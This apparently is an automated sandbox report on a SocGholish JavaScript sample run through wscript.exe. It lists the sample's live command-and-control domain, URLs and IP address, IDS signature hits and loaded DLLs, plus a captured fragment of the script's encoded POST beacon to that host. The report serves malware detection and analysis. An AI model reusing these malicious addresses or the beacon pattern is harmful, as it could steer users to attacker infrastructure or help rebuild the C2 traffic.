Source: https://bxs.anesthetics.biomedzglobal.com/ |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent9 |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContentG |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent |
Virustotal: Detection: 5% |
Source: unknown |
HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: Traffic |
Snort IDS: 2052170 ET TROJAN SocGholish CnC Domain in DNS Lookup (* .anesthetics .biomedzglobal .com) 192.168.2.4:64157 -> 1.1.1.1:53 |
Source: Traffic |
Snort IDS: 2052171 ET TROJAN SocGholish CnC Domain in TLS SNI (* .anesthetics .biomedzglobal .com) 192.168.2.4:49730 -> 45.59.170.27:443 |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 45.59.170.27 443 |
Source: Joe Sandbox View |
ASN Name: MEDIACOM-ENTERPRISE-BUSINESSUS MEDIACOM-ENTERPRISE-BUSINESSUS |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: bxs.anesthetics.biomedzglobal.com |
Source: unknown |
HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 12:24:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close |
Source: wscript.exe, 00000000.00000003.1736833114.000001A083AD9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/ |
Source: wscript.exe, wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736074113.000001A0859A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737220941.000001A0839C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701334680.000001A085810000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent |
Source: wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737880248.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent9 |
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentG |
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentg |
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B23000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Source: Version.125.7599.75.js |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal100.troj.evad.winJS@1/0@1/1 |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: jscript.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: dnsapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rasadhlp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: schannel.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mskeyprotect.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntasn1.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: dpapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: gpapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ncrypt.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ncryptsslp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: setRequestHeader("Upgrade-Insecure-Requests", "1");IServerXMLHTTPRequest2.send("tI//zLO+yCKDJY5Vnye1jc5pz1L3vJ3G5atMacSBjA==");<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Window found: window name: WSH-Timer |
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700913977.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 45.59.170.27 443 |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |